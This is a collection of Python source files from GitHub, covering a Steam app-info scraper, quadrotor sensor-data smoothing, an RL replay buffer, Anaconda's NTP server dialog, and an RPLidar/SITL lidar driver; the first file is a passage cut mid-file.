8/3/2023\"\"\"\nimport time\n\nfrom src import steamimport as stim\nfrom src import CSVHandler as csvh\n\ndef GetAppLists():\n \"\"\"Provided a list of appIDs, query Steam API for detailed information,\n Sanitize the gathered data, then write this data to a .csv file.\n User defined number of games to process\"\"\"\n appIDs = csvh.grabAppIDs('steamofficial.csv')\n index = csvh.grabIndex('indexer.csv')\n stIndex = index\n end = len(appIDs)\n\n while True:\n try:\n # groupSize = int(input('Number of games to process: '))\n # Used if user Defined sizes are required\n groupSize = 500\n except ValueError:\n print('Please input an integer.')\n else:\n break\n \n print('Beginning at index', index)\n st = time.time()\n while (index < end - 1) and (index - stIndex < groupSize):\n appInfo = stim.getAppInfo(appIDs[index])\n if appInfo == False:\n print('JSON failure at', index)\n print('Stopping requests...')\n break\n stim.saveData(appInfo, 'data/', 'compAppInfo.csv', stim.fieldsBaseSteam())\n index += 1\n csvh.updateIndex(index, 'indexer.csv')\n if index % 10 == 0 and index != 0:\n en = time.time()\n print('Jobs', index - 10, 'to', index, 'completed.')\n print('Took', round(en - st, 2), 'seconds')\n st = time.time()\n print(index - stIndex, 'completed. 
Stopping...')\n    csvh.updateIndex(index, 'indexer.csv')\n\nif __name__ == '__main__':\n    GetAppLists()","repo_name":"Wastfulajr/COP3530-Project-3","sub_path":"importdata.py","file_name":"importdata.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"827837508","text":"import os,fnmatch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nsave_path = \"/home/pratyush/Desktop/quadrotor_lqr/catkin_ws/src/offb_pkg/src/smooth_data/\"\n\nstates \t= os.listdir('../next_state/data/states/')\ncontrols_dir = '../next_state/data/controls/'\nacc_dir = '../next_state/data/acc/'\nnn2_dir = '../next_state/data/nn2/'\n\n\npattern = \"*.npy\"\n\nfilesName = []\n\nfor entry in states:\n\tif fnmatch.fnmatch(entry,pattern):\n\t\tprint(entry)\n\t\tfilesName.append(entry)\n\n\ncount = 0\nfor file in filesName:\n\tdata_dir = \"../next_state/data/states/\"\n\n\tstate \t= np.load(data_dir + file )\n\tcontrol = np.load(controls_dir + file)\n\tacc \t= np.load(acc_dir + file)\n\t# NOTE: assumed location of the angular-acceleration arrays; nn2/ is the only\n\t# remaining data directory in this dataset\n\talpha \t= np.load(nn2_dir + file)\n\n\tsize = state.shape[0]\n\tprint('file name: ' + file)\n\tcount += 1\n\n\tx = []\n\ty = []\n\tz = []\n\n\tvx = []\n\tvy = []\n\tvz = []\n\n\tphi = []\n\ttheta = []\n\tpsi = []\n\n\n\tsin_phi = []\n\tsin_theta = []\n\tsin_psi = []\n\n\n\tcos_phi = []\n\tcos_theta = []\n\tcos_psi = []\n\n\n\trs = []\n\tps = []\n\tys = []\n\n\n\tu1 = []\n\tu2 = []\n\tu3 = []\n\tu4 = []\n\n\tac_x = []\n\tac_y = []\n\tac_z = []\n\n\n\talpha_x = []\n\talpha_y = []\n\talpha_z = []\n\n\n\ts_vx = []\n\ts_vy = []\n\ts_vz = []\n\n\ts_rs = []\n\ts_ps = []\n\ts_ys = []\n\n\ts_ac_x = []\n\ts_ac_y = []\n\ts_ac_z = []\n\n\n\ts_alpha_x = []\n\ts_alpha_y = []\n\ts_alpha_z = []\n\n\n\ta = 0.05\n\n\tfor row in range(0,size):\n\t\tx.append(state[row,0])\n\t\ty.append(state[row,1])\n\t\tz.append(state[row,2])\n\n\t\tvx.append(state[row,3])\n\t\tvy.append(state[row,4])\n\t\tvz.append(state[row,5])\n\n\t\tsin_phi.append(state[row,6])\n\t\tsin_theta.append(state[row,7])\n\t\tsin_psi.append(state[row,8])\n\n\n\t\tcos_phi.append(state[row,9])\n\t\tcos_theta.append(state[row,10])\n\t\tcos_psi.append(state[row,11])\n\n\n\t\trs.append(state[row,12])\n\t\tps.append(state[row,13])\n\t\tys.append(state[row,14])\n\n\t\tphi.append(state[row,15])\n\t\ttheta.append(state[row,16])\n\t\tpsi.append(state[row,17])\n\n\t\tu1.append(control[row,0]*1)\n\t\tu2.append(control[row,1]*1)\n\t\tu3.append(control[row,2]*1)\n\t\tu4.append(control[row,3]*1)\n\n\n\t\tac_x.append(acc[row,0])\n\t\tac_y.append(acc[row,1])\n\t\tac_z.append(acc[row,2])\n\n\t\talpha_x.append(alpha[row,0])\n\t\talpha_y.append(alpha[row,1])\n\t\talpha_z.append(alpha[row,2])\n\n\n\t## Linear velocity\n\ttemp_x = state[0,3]\n\ttemp_y = state[0,4]\n\ttemp_z = state[0,5]\n\tfor row in range(0,size):\n\n\t\ttemp_x = temp_x + a*(state[row,3] - temp_x)\n\t\ttemp_y = temp_y + a*(state[row,4] - temp_y)\n\t\ttemp_z = temp_z + a*(state[row,5] - temp_z)\n\n\t\ts_vx.append( temp_x )\n\t\ts_vy.append( temp_y )\n\t\ts_vz.append( temp_z )\n\n\n\n\t## Linear Acceleration\n\ttemp_x = acc[0,0]\n\ttemp_y = acc[0,1]\n\ttemp_z = acc[0,2]\n\tfor row in range(0,size):\n\n\t\ttemp_x = temp_x + a*(acc[row,0] - temp_x)\n\t\ttemp_y = temp_y + a*(acc[row,1] - temp_y)\n\t\ttemp_z = temp_z + a*(acc[row,2] - temp_z)\n\n\t\ts_ac_x.append( temp_x )\n\t\ts_ac_y.append( temp_y )\n\t\ts_ac_z.append( temp_z )\n\n\n\n\t## Angular Velocity\n\ttemp_x = state[0,12]\n\ttemp_y = state[0,13]\n\ttemp_z = state[0,14]\n\tfor row in range(0,size):\n\n\t\ttemp_x = temp_x + a*(state[row,12] - temp_x)\n\t\ttemp_y = temp_y + a*(state[row,13] - temp_y)\n\t\ttemp_z = temp_z + a*(state[row,14] - temp_z)\n\n\t\ts_rs.append( temp_x )\n\t\ts_ps.append( temp_y )\n\t\ts_ys.append( temp_z )\n
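# --- editor's aside ------------------------------------------------------------
# Every smoothing block in this script is the same first-order exponential
# moving average, s[t] = s[t-1] + a*(x[t] - s[t-1]) with a = 0.05. A compact
# reference implementation of that filter:
def ema(xs, a=0.05):
    out, s = [], xs[0]
    for x in xs:
        s = s + a * (x - s)
        out.append(s)
    return out

assert ema([1.0, 1.0, 1.0]) == [1.0, 1.0, 1.0]  # a constant signal is unchanged
# -------------------------------------------------------------------------------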
\n\n\t## Angular Acceleration\n\ttemp_x = s_rs[0]\n\ttemp_y = s_ps[0]\n\ttemp_z = s_ys[0]\n\tdelta_t = 0.02\n\n\tfor row in range(1,size):\n\n\t\t# temp_x = temp_x + a*(acc[row,0] - temp_x)\n\t\t# temp_y = temp_y + a*(acc[row,1] - temp_y)\n\t\t# temp_z = temp_z + a*(acc[row,2] - temp_z)\n\n\t\ts_alpha_x.append((s_rs[row] - temp_x )/delta_t)\n\t\ts_alpha_y.append((s_ps[row] - temp_y )/delta_t)\n\t\ts_alpha_z.append((s_ys[row] - temp_z )/delta_t)\n\n\t\ttemp_x = s_rs[row]\n\t\ttemp_y = s_ps[row]\n\t\ttemp_z = s_ys[row]\n\n\n\t# temp_x = alpha_x[0]\n\t# temp_y = alpha_y[0]\n\t# temp_z = alpha_z[0]\n\t# for row in range(0,size):\n\n\t# \ttemp_x = temp_x + a*(alpha_x[row] - temp_x)\n\t# \ttemp_y = temp_y + a*(alpha_y[row] - temp_y)\n\t# \ttemp_z = temp_z + a*(alpha_z[row] - temp_z)\n\n\t# \ts_alpha_x.append( temp_x )\n\t# \ts_alpha_y.append( temp_y )\n\t# \ts_alpha_z.append( temp_z )\n\n\t# assemble the smoothed state matrix and save it once per file\n\ts_state = np.array([x,y,z, s_vx, s_vy, s_vz, phi, theta, psi, s_rs, s_ps, s_ys],ndmin=2).transpose()\n\tnp.save(save_path + file, s_state)","repo_name":"pratyusv/px4_data_collection","sub_path":"catkin_ws/src/offb_pkg/src/plots/smooth_data.py","file_name":"smooth_data.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"39131836868","text":"import numpy as np\n\n\nclass ReplayBuffer():\n    def __init__(self, max_size, input_dims):\n        self.mem_size = max_size\n        self.mem_cntr = 0\n\n        self.state_memory = np.zeros((self.mem_size, input_dims), dtype=np.int64)\n        self.new_state_memory = np.zeros((self.mem_size, input_dims), dtype=np.int64)\n        self.action_memory = np.zeros(self.mem_size, dtype=np.int64)\n        self.reward_memory = np.zeros(self.mem_size, dtype=np.int64)\n        self.terminal_memory = np.zeros(self.mem_size, dtype=np.int64)\n\n    def store_transition(self, state, action, reward, next_state, terminal):\n        index = self.mem_cntr % self.mem_size\n        self.state_memory[index] = state\n        self.new_state_memory[index] = next_state\n        self.action_memory[index] = action\n        self.reward_memory[index] = reward\n        self.terminal_memory[index] = int(1-terminal)\n        self.mem_cntr += 1\n\n    def sample_buffer(self, batch_size):\n        max_mem = min(self.mem_cntr, self.mem_size)\n        batch = np.random.choice(max_mem, batch_size, replace=False)\n\n        states = self.state_memory[batch]\n        next_states = self.new_state_memory[batch]\n        actions = self.action_memory[batch]\n        rewards = self.reward_memory[batch]\n        terminals = self.terminal_memory[batch]\n\n        return states, next_states, actions, rewards, terminals\n","repo_name":"cichyr/CarAI","sub_path":"ReplayBuffer.py","file_name":"ReplayBuffer.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74984552100","text":"from pyanaconda import network\nfrom pyanaconda import ntp\nfrom pyanaconda.anaconda_loggers import get_module_logger\nfrom pyanaconda.core import constants\nfrom pyanaconda.core.configuration.anaconda import conf\nfrom pyanaconda.core.constants import TIME_SOURCE_POOL, TIME_SOURCE_SERVER\nfrom pyanaconda.core.service import restart_service\nfrom pyanaconda.core.timer import Timer\nfrom pyanaconda.modules.common.structures.timezone import TimeSourceData\nfrom pyanaconda.ui.gui import GUIObject\nfrom 
pyanaconda.ui.gui.utils import override_cell_property\nfrom pyanaconda.timezone import NTP_SERVICE\n\nlog = get_module_logger(__name__)\n\n# constants for server store indices\nSERVER_HOSTNAME = 0\nSERVER_POOL = 1\nSERVER_NTS = 2\nSERVER_WORKING = 3\nSERVER_OBJECT = 4\n\nSERVER_STARTING_STRING = \"\"\n\n\nclass NTPConfigDialog(GUIObject):\n builderObjects = [\"ntpConfigDialog\", \"serversStore\"]\n mainWidgetName = \"ntpConfigDialog\"\n uiFile = \"spokes/lib/ntp_dialog.glade\"\n\n def __init__(self, data, servers, states):\n GUIObject.__init__(self, data)\n self._servers = servers\n self._active_server = None\n self._states = states\n\n # self.window.set_size_request(500, 400)\n\n working_column = self.builder.get_object(\"workingColumn\")\n working_renderer = self.builder.get_object(\"workingRenderer\")\n override_cell_property(working_column, working_renderer, \"icon-name\", self._render_working)\n\n self._serversView = self.builder.get_object(\"serversView\")\n self._serversStore = self.builder.get_object(\"serversStore\")\n\n self._update_timer = Timer()\n\n def _render_working(self, column, renderer, model, itr, user_data=None):\n value = self._serversStore[itr][SERVER_WORKING]\n\n if value == constants.NTP_SERVER_QUERY:\n return \"dialog-question-symbolic\"\n elif value == constants.NTP_SERVER_OK:\n return \"emblem-default-symbolic\"\n else:\n return \"dialog-error-symbolic\"\n\n def refresh(self):\n # Update the store.\n self._serversStore.clear()\n\n for server in self._servers:\n self._add_row(server)\n\n # Start to update the status.\n self._update_timer.timeout_sec(1, self._update_rows)\n\n def run(self):\n self.window.show()\n rc = self.window.run()\n self.window.hide()\n\n # OK clicked\n if rc == 1:\n # Clean up unedited entries\n self._cleanup_unedited_entry()\n # Restart the NTP service.\n if conf.system.can_set_time_synchronization:\n ntp.save_servers_to_config(self._servers)\n restart_service(NTP_SERVICE)\n\n return rc\n\n def _get_last_entry_itr(self):\n \"\"\"Get itr of the last entry.\"\"\"\n index = len(self._serversStore) - 1\n\n if index < 0:\n return None\n\n return self._serversStore.get_iter_from_string(str(index))\n\n def _is_last_entry_unedited(self):\n \"\"\"Is the last entry unedited?\"\"\"\n itr = self._get_last_entry_itr()\n\n if not itr:\n return False\n\n server = self._serversStore[itr][SERVER_OBJECT]\n return server.hostname == SERVER_STARTING_STRING\n\n def _cleanup_unedited_entry(self):\n \"\"\"Clean up unedited entry.\n\n There can be only one, at the very end.\n \"\"\"\n if not self._is_last_entry_unedited():\n return\n\n itr = self._get_last_entry_itr()\n self._serversStore.remove(itr)\n del self._servers[-1]\n\n def _add_row(self, server):\n \"\"\"Add a new row for the given NTP server.\n\n :param server: an NTP server\n :type server: an instance of TimeSourceData\n \"\"\"\n itr = self._serversStore.append([\n \"\",\n False,\n False,\n constants.NTP_SERVER_QUERY,\n server\n ])\n\n self._refresh_row(itr)\n\n def _refresh_row(self, itr):\n \"\"\"Refresh the given row.\"\"\"\n server = self._serversStore[itr][SERVER_OBJECT]\n self._serversStore.set_value(itr, SERVER_HOSTNAME, server.hostname)\n self._serversStore.set_value(itr, SERVER_POOL, server.type == TIME_SOURCE_POOL)\n self._serversStore.set_value(itr, SERVER_NTS, \"nts\" in server.options)\n\n def _update_rows(self):\n \"\"\"Periodically update the status of all rows.\n\n :return: True to repeat, otherwise False\n \"\"\"\n for row in self._serversStore:\n server = row[SERVER_OBJECT]\n\n if 
server is self._active_server:\n continue\n\n status = self._states.get_status(server)\n row[SERVER_WORKING] = status\n\n return True\n\n def on_add_button_clicked(self, *args):\n \"\"\"Handler for Add button.\n\n Tries to add a new server for editing, or reuse an existing server that was not edited\n after adding.\n \"\"\"\n # check if there is any unedited server\n # exactly zero or one such server can exist, at last position only\n if not self._is_last_entry_unedited():\n # no unedited leftover, so make a new server with a reasonable guess about the defaults\n server = TimeSourceData()\n server.type = TIME_SOURCE_SERVER\n server.hostname = SERVER_STARTING_STRING\n server.options = [\"iburst\"]\n # add the (still invalid) server\n self._servers.append(server)\n self._states.check_status(server)\n self._add_row(server)\n\n # select the correct row - it is always the last one\n itr = self._get_last_entry_itr()\n selection = self._serversView.get_selection()\n selection.select_iter(itr)\n self._serversView.grab_focus()\n\n # start editing the newly added server hostname\n # it is already selected so just \"press\" the edit button\n self.on_edit_button_clicked(*args)\n\n def on_edit_button_clicked(self, *args):\n \"\"\"Handler for Edit button\"\"\"\n selection = self._serversView.get_selection()\n store, items = selection.get_selected_rows() # pylint: disable=unused-variable\n path = items[-1] # take only the last item\n column = self._serversView.get_column(0) # first column is server/hostname\n self._serversView.set_cursor(path, column, True)\n\n def on_remove_button_clicked(self, *args):\n \"\"\"Handler for Remove button\"\"\"\n selection = self._serversView.get_selection()\n store, items = selection.get_selected_rows()\n for path in reversed(items):\n itr = store.get_iter(path)\n server = store[itr][SERVER_OBJECT]\n store.remove(itr)\n self._servers.remove(server)\n\n def on_pool_toggled(self, renderer, path, *args):\n itr = self._serversStore.get_iter(path)\n server = self._serversStore[itr][SERVER_OBJECT]\n\n if server.type == TIME_SOURCE_SERVER:\n server.type = TIME_SOURCE_POOL\n else:\n server.type = TIME_SOURCE_SERVER\n\n self._refresh_row(itr)\n\n def on_nts_toggled(self, renderer, path, *args):\n itr = self._serversStore.get_iter(path)\n server = self._serversStore[itr][SERVER_OBJECT]\n\n if \"nts\" in server.options:\n server.options.remove(\"nts\")\n else:\n server.options.append(\"nts\")\n\n self._states.check_status(server)\n self._refresh_row(itr)\n\n def on_server_editing_started(self, renderer, editable, path):\n itr = self._serversStore.get_iter(path)\n self._active_server = self._serversStore[itr][SERVER_OBJECT]\n\n def on_server_editing_canceled(self, renderer):\n self._active_server = None\n\n def on_server_edited(self, renderer, path, new_text, *args):\n self._active_server = None\n\n if not path:\n return\n\n (valid, error) = network.is_valid_hostname(new_text)\n if not valid:\n log.error(\"'%s' is not a valid hostname: %s\", new_text, error)\n return\n\n itr = self._serversStore.get_iter(path)\n server = self._serversStore[itr][SERVER_OBJECT]\n\n if server.hostname == new_text:\n return\n\n server.hostname = new_text\n self._states.check_status(server)\n self._refresh_row(itr)\n","repo_name":"rhinstaller/anaconda","sub_path":"pyanaconda/ui/gui/spokes/lib/ntp_dialog.py","file_name":"ntp_dialog.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","stars":494,"dataset":"github-code","pt":"35"} 
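# --- editor's aside ------------------------------------------------------------
# The lidar driver in the next record frames payload commands as
# START_FLAG + cmd + length + payload + XOR checksum (see its
# _send_payload_cmd, as shown below). A standalone sketch of that framing;
# the command byte 0x25 is just an example value:
import struct

def frame_cmd(cmd: bytes, payload: bytes, start_flag: bytes = b"\xA5") -> bytes:
    req = start_flag + cmd + struct.pack("B", len(payload)) + payload
    checksum = 0
    for v in req:
        checksum ^= v
    return req + struct.pack("B", checksum)

pkt = frame_cmd(b"\x25", b"\x01\x02")
assert pkt[-1] == 0xA5 ^ 0x25 ^ 0x02 ^ 0x01 ^ 0x02  # the length byte is 0x02
# -------------------------------------------------------------------------------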
+{"seq_id":"13422371689","text":"\"\"\"\r\n@author: Dhruv Parikh\r\n@organisation: General Aeronautics Pvt. Ltd.\r\n@date: 1-03-2022\r\n\"\"\"\r\n\r\n\"\"\"\r\n@Description:\r\n Sensor driver for lidar/radar\r\n @Todo: Add UART driver support\r\n Add CAN driver support\r\n\"\"\"\r\n\r\n\r\nimport math\r\nimport socket\r\nimport math\r\nimport logging\r\nimport threading\r\nimport serial\r\nimport time\r\nimport struct\r\n\r\nclass SensorDriver():\r\n def __init__(self,drivertype):\r\n \"\"\"Initialiser for Sensor Driver\r\n\r\n Args:\r\n drivertype (String): Put in SITL or RPLidar\r\n \"\"\"\r\n self.HOST = None\r\n self.raw_data = [40]*360\r\n self.drivername = drivertype\r\n \r\n #Connect to local host and port. This connects to the C++ bridge\r\n if drivertype == 'SITL':\r\n self.HOST, self.PORT = \"localhost\", 8080\r\n self.raw_data = [0]*10\r\n self.lid = []\r\n\r\n #Connect to actual RPLidar. Warning: Pretty unstable code \r\n else:\r\n self.PORT = '/dev/ttyUSB0'\r\n self.START_FLAG = b\"\\xA5\"\r\n self.HEALTH_CMD = b\"\\x52\"\r\n self.GET_INFO = b\"\\x50\"\r\n self.RESET = b\"\\x40\"\r\n \r\n self.STOP = b\"\\x25\"\r\n self.START_SCAN = b\"\\x20\"\r\n self.HEALTH = 1\r\n self.INFO = 2\r\n self.SCAN = 3\r\n self.RESPONSE_FLAG = b\"\\x5A\"\r\n \r\n self.master_angle = []\r\n self.master_distance = []\r\n \r\n self.scan_data = None\r\n \r\n\r\n \r\n\r\n def connect_and_fetch(self):\r\n \"\"\"Connects to the sensor and starts the scan request\r\n \"\"\"\r\n #SITl\r\n if self.HOST != None:\r\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.s.connect((self.HOST, self.PORT))\r\n logging.info(\"Bridge initialised\")\r\n \r\n #RPLidar\r\n else:\r\n #Connect to the sensor\r\n self.lidar_connection = serial.Serial(self.PORT,baudrate=115200,parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,timeout=1)\r\n #Sleep for 2 Seconds\r\n time.sleep(2)\r\n #Send Stop Scan request\r\n self.send_stopscan_request()\r\n print(\"Stopped\")\r\n #Wait for few ms\r\n time.sleep(0.002)\r\n #Reset the lidar\r\n self.send_reset_request()\r\n #Stop the motor\r\n self.set_pwm(0)\r\n\r\n time.sleep(2)\r\n #Clear the buffer\r\n self.clear_input_buffer() \r\n \r\n #Start the motor\r\n self.set_pwm(866)\r\n\r\n\r\n\r\n time.sleep(1)\r\n #Send the request to start scanning - by this time, the motor would be at constant rate and hence should output data immediately\r\n self.start_scan_request()\r\n #Read the header of the response packet\r\n self.read_response()\r\n \r\n def read_fast(self):\r\n \"\"\"\r\n Read all stack of 4000 bytes from the buffer. \r\n This function has to be called only once - create a seperate thread\r\n \"\"\"\r\n while True:\r\n if self.lidar_connection.inWaiting()>300:\r\n self.scan_data = self.pass_raw_data(4000)\r\n\r\n def clear_input_buffer(self):\r\n \"\"\"Clears the input buffer multiple times\r\n We will make sure that my fragile and non robust driver won't have any problems with the header\r\n\r\n @Warning:\r\n Don't Call haphazardly. \r\n \"\"\"\r\n for i in range(1000):\r\n self.lidar_connection.reset_input_buffer()\r\n\r\n def give_scan_values(self):\r\n \"\"\"\r\n Parse the readings, append the angle and distance from it. \r\n Note that every new scan, the old scan values are discarded. 
\r\n        This is okay for memory based sense and stop as it stores the values anyway.\r\n        \"\"\"\r\n        while True:\r\n            time.sleep(0.0001)\r\n            # If there is data populated\r\n            if self.scan_data is not None:\r\n                # Protect the instant data -> Tip: We need such protectors in every function\r\n                data = self.scan_data\r\n\r\n                # For each 5 byte packet, parse the readings according to the datasheet\r\n                for i in range(0,len(data),5):\r\n\r\n                    new_scan, angle, distance = self.parse_scan_readings(data[i:i+5])\r\n                    # -1 flags a malformed packet from parse_scan_readings; it must be\r\n                    # checked first, since -1 is also truthy\r\n                    if new_scan == -1:\r\n                        print(\"problem\")\r\n                    # If we get a new scan, remove all the previous data and start appending\r\n                    elif new_scan:\r\n                        self.master_angle = []\r\n                        self.master_distance = []\r\n                        self.master_angle.append(angle)\r\n                        self.master_distance.append(distance)\r\n                    # Keep appending till we get a new scan header\r\n                    else:\r\n                        self.master_angle.append(float(angle))\r\n                        self.master_distance.append(float(distance))\r\n\r\n    def update_rplidar(self):\r\n        \"\"\"\r\n        @Description:\r\n            Populates the lidar data in the raw_data var\r\n            If lidar data outputs more than 10 measurements per scan, then we will consider the output\r\n            The data is downsampled to a resolution of 1 degree to be fed to the SAADataHandler\r\n        \"\"\"\r\n\r\n        lid = []\r\n        ang = []\r\n        mag = [40]*360\r\n        # print(mag)\r\n\r\n\r\n        # Saving the values so they don't get updated mid-scan\r\n        # This is an example of the many length based checks done to ensure that data is there before we start dividing stuff by zero\r\n\r\n        master_angles_copy = self.master_angle\r\n        master_distance_copy = self.master_distance\r\n        if len(master_angles_copy)>2 and (len(master_distance_copy)==len(master_angles_copy)):\r\n            angles = master_angles_copy\r\n            distance = master_distance_copy\r\n        else:\r\n            # Wait for some time to populate a few more readings\r\n            time.sleep(0.001)\r\n            if((len(self.master_distance)==len(self.master_angle))):\r\n                angles = self.master_angle\r\n                distance = self.master_distance\r\n            else:\r\n                master_angles_copy = self.master_angle\r\n                master_distance_copy = self.master_distance\r\n\r\n                min_len = min(len(master_distance_copy),len(master_angles_copy))\r\n                print(min_len)\r\n                angles = master_angles_copy[0:min_len-1]\r\n                distance = master_distance_copy[0:min_len-1]\r\n\r\n\r\n        # Reset the vars\r\n        mag = [40]*360\r\n\r\n        # Number of measurements in this scan\r\n        no_of_scans = len(angles)\r\n        # If scan is valid\r\n        if no_of_scans>2:\r\n            # Append the data to lidar and magnitude\r\n            for j in range(no_of_scans-1):\r\n                # Sometimes an index error occurs\r\n                # lid.append(float(scan[j][2]))\r\n                # Downsampling the angular reading\r\n                # if ang = 1.2, it will be converted to 1\r\n                # ang.append(int(math.floor(scan[j][1])))\r\n                ang = (math.floor(angles[j]))\r\n                if ang>359 or ang<0:\r\n                    ang = 0\r\n                try:\r\n                    mag[ang] = float(distance[j])/1000\r\n                except:\r\n                    print(len(angles),j,no_of_scans)\r\n\r\n            # Assign to the global var once the data is populated\r\n            self.raw_data = mag\r\n\r\n        else:\r\n            # If the number of scans is too small, assign the default unusable reading\r\n            self.raw_data = mag\r\n\r\n    def return_readings(self):\r\n        \"\"\"Raw data accessor\r\n\r\n        Returns:\r\n            1D array of length 360\r\n        \"\"\"\r\n        return self.raw_data\r\n\r\n\r\n    def update_sitl_sensor(self):\r\n        \"\"\"This is for Gazebo SITL. 
It just decodes the sockets \r\n \"\"\"\r\n\r\n #Empty the array for new fetch\r\n lid = []\r\n\r\n #empty the data\r\n data = None\r\n\r\n #Keep fetching until the data is filled with 64 indices\r\n while len(lid)<=64:\r\n data = self.s.recv(4).decode(\"utf-8\") \r\n #If we recieve a new packet of data\r\n if data == 'new ':\r\n if len(lid) == 64:\r\n self.raw_data = lid\r\n lid = [] \r\n elif data != None:\r\n lid.append(float(data))\r\n \r\n def send_health_request(self):\r\n \"\"\"Sends the health request. It doesn't handle the recieve commands\r\n \"\"\"\r\n if self.lidar_connection.is_open:\r\n buf = self.START_FLAG + self.HEALTH_CMD\r\n self.lidar_connection.write(buf)\r\n self.request = self.HEALTH\r\n\r\n def send_getinfo_request(self):\r\n self.send_cmd(self.GET_INFO)\r\n self.request = self.INFO\r\n\r\n def send_reset_request(self):\r\n \"\"\"This function doesnt work that well. Need more tests. Kindly don't use\r\n \"\"\"\r\n self.lidar_connection.setDTR(True)\r\n self.send_cmd(self.RESET)\r\n \r\n \r\n def send_stopscan_request(self):\r\n \"\"\"Stops the scan.\r\n \"\"\"\r\n self.lidar_connection.setDTR(True)\r\n self.send_cmd(self.STOP)\r\n \r\n def start_scan_request(self):\r\n \"\"\"Starts the scan. \r\n \"\"\"\r\n self.lidar_connection.setDTR(True)\r\n self.send_cmd(self.START_SCAN)\r\n self.request = self.SCAN\r\n \r\n def send_cmd(self,cmd):\r\n \"\"\"Sends the command to the RPLidar. Since each command is send using the start flag, this common function\r\n helps.\r\n\r\n Args:\r\n cmd (Byte String): Declare the vars in the class variables\r\n \"\"\"\r\n if self.lidar_connection.is_open:\r\n buf = self.START_FLAG + cmd\r\n self.lidar_connection.write(buf)\r\n \r\n def read_response(self):\r\n \"\"\"This function reads predefined responses. \r\n @TODO: A better implementation is required.\r\n\r\n Returns:\r\n Your byte data\r\n \"\"\"\r\n if self.lidar_connection.is_open:\r\n #Based on request, the amount of bytes to read is defined and headers are checked. \r\n if self.request == self.HEALTH:\r\n data_len = 3\r\n data = self.lidar_connection.read(7)\r\n if self.request ==self.INFO:\r\n data_len = 20\r\n data = self.lidar_connection.read(7)\r\n if self.request == self.SCAN:\r\n data_len = 0\r\n data = self.lidar_connection.read(7)\r\n \r\n return self.check_data_header(data,data_len)\r\n \r\n def check_data_header(self,data,data_len):\r\n \"\"\"This function checks the data header. Without this, no data can be read.\r\n\r\n Args:\r\n data (Bytesarray): Bytes array of header\r\n data_len (int): Amount of data to read for that specific request\r\n\r\n Returns:\r\n bytesarray: Returns the byte array if all checks are passed\r\n \"\"\"\r\n if len(data) != 7:\r\n print(\"Descriptor length mismatch\")\r\n return None\r\n elif not data.startswith(self.START_FLAG + self.RESPONSE_FLAG):\r\n print(\"Incorrect descriptor starting bytes\")\r\n return None\r\n else:\r\n if data_len!=0:\r\n data = (self.lidar_connection.read(data_len))\r\n return data\r\n \r\n def interprete_data(self,data):\r\n \"\"\"Unused function from initial design\r\n\r\n \"\"\"\r\n if len(data) > 0:\r\n if self.request == self.HEALTH:\r\n self.device_health = data[0]\r\n # if self.request == self.motor\r\n print(data)\r\n\r\n def _send_payload_cmd(self, cmd: bytes, payload: bytes) -> None:\r\n \"\"\"Sends the payload data (for motor spin). 
I have taken it from slamtec library.\r\n\r\n        Args:\r\n            cmd (bytes): MOTOR START\r\n            payload (bytes)\r\n        \"\"\"\r\n        size = struct.pack(\"B\", len(payload))\r\n        req = self.START_FLAG + cmd + size + payload\r\n\r\n        checksum = 0\r\n        for v in struct.unpack(\"B\" * len(req), req):\r\n            checksum ^= v\r\n        req += struct.pack(\"B\", checksum)\r\n        self.lidar_connection.write(req)\r\n        # Indicator that the command is sent\r\n        print('Command sent: %s' % self._showhex(req))\r\n\r\n    def _showhex(self, signal):\r\n        \"\"\"Converts a byte string to its hex representation (handy for debugging)\"\"\"\r\n        return [format(b, '#02x') for b in signal]\r\n\r\n    def set_pwm(self, pwm: int) -> None:\r\n        \"\"\"Just call this function to start the motor\r\n\r\n        Args:\r\n            pwm (int): Keep it above 800 pwm\r\n        \"\"\"\r\n        self.lidar_connection.setDTR(False)\r\n        payload = struct.pack(\"<H\", pwm)\r\n        # 0xF0 is the RPLidar SET_PWM payload command byte\r\n        self._send_payload_cmd(b\"\\xF0\", payload)\r\n\r\n    def pass_raw_data(self, bytes):\r\n        \"\"\"Just a read handler\r\n\r\n        Args:\r\n            bytes (int): Number of bytes\r\n\r\n        Returns:\r\n            bytesarray\r\n        \"\"\"\r\n        return self.lidar_connection.read(bytes)\r\n\r\n\r\n    def parse_scan_readings(self,raw:bytes):\r\n\r\n        if len(raw)<5:\r\n            print(\"Length not enough\")\r\n            return -1,0,0\r\n        else:\r\n            new_scan = bool(raw[0] & 0b1)\r\n            inversed_new_scan = bool((raw[0] >> 1) & 0b1)\r\n            quality = raw[0] >> 2\r\n            if new_scan == inversed_new_scan:\r\n                print(\"New scan flags mismatch\")\r\n                # self.send_stopscan_request()\r\n                self.lidar_connection.flushInput()\r\n\r\n                return -1,0,0\r\n            else:\r\n                angle = ((raw[1] >> 1) + (raw[2] << 7)) / 64.0\r\n                distance = (raw[3] + (raw[4] << 8)) / 4.0\r\n                return new_scan,angle,distance\r\n\r\n\r\n    def _process_scan(self,raw: bytes):\r\n        \"\"\"Processes input raw data and returns measurement data\"\"\"\r\n        if len(raw)==5:\r\n            new_scan = bool(raw[0] & 0b1)\r\n            inversed_new_scan = bool((raw[0] >> 1) & 0b1)\r\n            quality = raw[0] >> 2\r\n            if new_scan == inversed_new_scan:\r\n                print(\"New scan flags mismatch\")\r\n                return 0,0,0,0\r\n            check_bit = raw[1] & 0b1\r\n            if check_bit != 1:\r\n                print(\"Check bit not equal to 1\")\r\n                return 0,0,0,0\r\n\r\n            angle = ((raw[1] >> 1) + (raw[2] << 7)) / 64.0\r\n            distance = (raw[3] + (raw[4] << 8)) / 4.0\r\n            return new_scan, quality, angle, distance","repo_name":"mhrrrr/Phase-1","sub_path":"util/SAADriver.py","file_name":"SAADriver.py","file_ext":"py","file_size_in_byte":15087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 